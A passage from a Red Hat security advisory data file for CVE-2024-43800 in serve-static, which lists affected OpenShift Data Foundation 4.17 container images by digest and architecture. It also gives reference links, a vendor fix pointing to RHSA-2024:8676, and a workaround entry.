"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
